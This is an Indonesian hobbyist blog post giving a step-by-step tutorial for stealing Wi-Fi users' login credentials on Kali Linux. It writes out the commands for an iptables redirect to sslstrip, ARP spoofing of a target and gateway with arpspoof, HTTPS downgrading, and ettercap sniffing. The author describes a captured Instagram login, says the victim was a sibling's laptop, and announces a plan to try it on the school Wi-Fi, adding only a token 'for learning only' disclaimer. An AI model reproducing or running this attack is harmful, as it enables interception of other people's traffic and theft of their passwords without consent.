halo fans, Nuenomaru disini .-.
kali ini Nuenomaru akan Share Tutorial Melihat Username dan Password Pengguna Jaringan Wifi di Linux. seperti biasa, di tutorial ini Nue mempraktekannya di Kali Linux, untuk para penjinak pinguin yang lain, silahkan di icip di pinguin2 kesayangan anda.
di Tutorial ini Kita akan padukan Teknik MITM & Sniffing.
Teknik ini biasa di sebut Man In The Middle Attack (MITM)
Apa itu MITM ?
Serangan Man in The Middle (MiTM) adalah salah satu serangan hacking yang dilakukan dari dalam jaringan untuk melakukan penyadapan informasi dengan cara membelokkan jalur koneksi dimana penyerang berada di antara dua target yang sedang melakukan komunikasi
Let's Play with Me Baby ;*
Biar gak penasaran langsung saja bro kita praktekkan
Pertama kita buka terlebih dahulu konfigurasi ettercap yang berada di folder /etc/ettercap/ kita buka menggunkan leafpad
leafpad /etc/ettercap/etter.conf
selanjutnya cari kata # if you use iptables: kemudian hilangkan tanda pagar di depan redir_command_on dan redir_command_off
Menjadi
selanjutnya kita aktifkan IP Forward dengan perintah
echo 1 > /proc/sys/net/ipv4/ip_forward
kemudian redirect port 80 ke 10000, agar koneksi pada port default akses web (80) kita redirect ke port SSLSTRIP yang kita gunakan untuk menterjemahkan akses HTTPS ke HTTP, dengan perintah
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sebelum ke tahap selanjutnya kita harus mengatahui ip gateway dan ip target terlebih dahulu,
untuk mengetahui ip gateway cukup ketikkan di terminal
route -n
selanjutnya untuk mengetahui ip target disini saya menggunakan angry ip scanner, kalian juga bisa menggunakan autoscan-network, nmap dan sebagainya
disini saya sudah mendapatkan target yg sedang aktif di jaringan wifi
Selanjutnya lakukan spoof arp menggunakan arpspoof
arpspoof -i wlan0 -t 192.168.1.102 192.168.1.254
keterangan:
wlan0 : jenis interface yang digunakan
192.168.1.102 : Ip target
192.168.1.254 : ip gateway
Sejanjutnya buka terminal baru untuk menjalankan sslstrip, perintahnya
sslstrip -akf
Buka terminal baru lagi untuk melakukan sniffing dengan menggunakan ettercap
ettercap -T -q -i wlan0 -M arp // //
Jadi nanti jika target mengakses situs-situs yang memerlukan login, akan muncul detail user dan password serta link situs yang dia buka, di bawah Hit.
seperti di gambar:
Terlihat username dan pasword korban sedang login di instagram
wkwkw, maaf SS korban masih makai SS dari blognya bang anherr >.<
abis dari tadi gw nunggu korban gak buka2 situs, yep korbannya laptop adik gw sendiri wkwkw. ternyata dia lg fokus ngerjain tugas. gak sama sekali buka web sosmed -_-
niatnya pgn gw praktekin ke wifi sekolah bsk ^^
Postingan berikut dibuat hanya sebagai pembelajaran saja ya bro, jadi jangan di salah gunakan, gunakan ilmu dengan bijak :D
Mudahkan o.O ? Stay Cool and Keep ./Crotz ,gaes :'v
Salam para penjinak pinguin :v , Penunggang Naga, Viva Real Tux Warrior Gaes :'v wkkwkwkw
bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ Cyber Art
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Go OpenSource Indonesia~
Sekian dan semoga bermanfaat .. terimakasih
source and thanks to: Anherr Blog's
./Nuenomaru
Visit and follow :
EmoticonEmoticon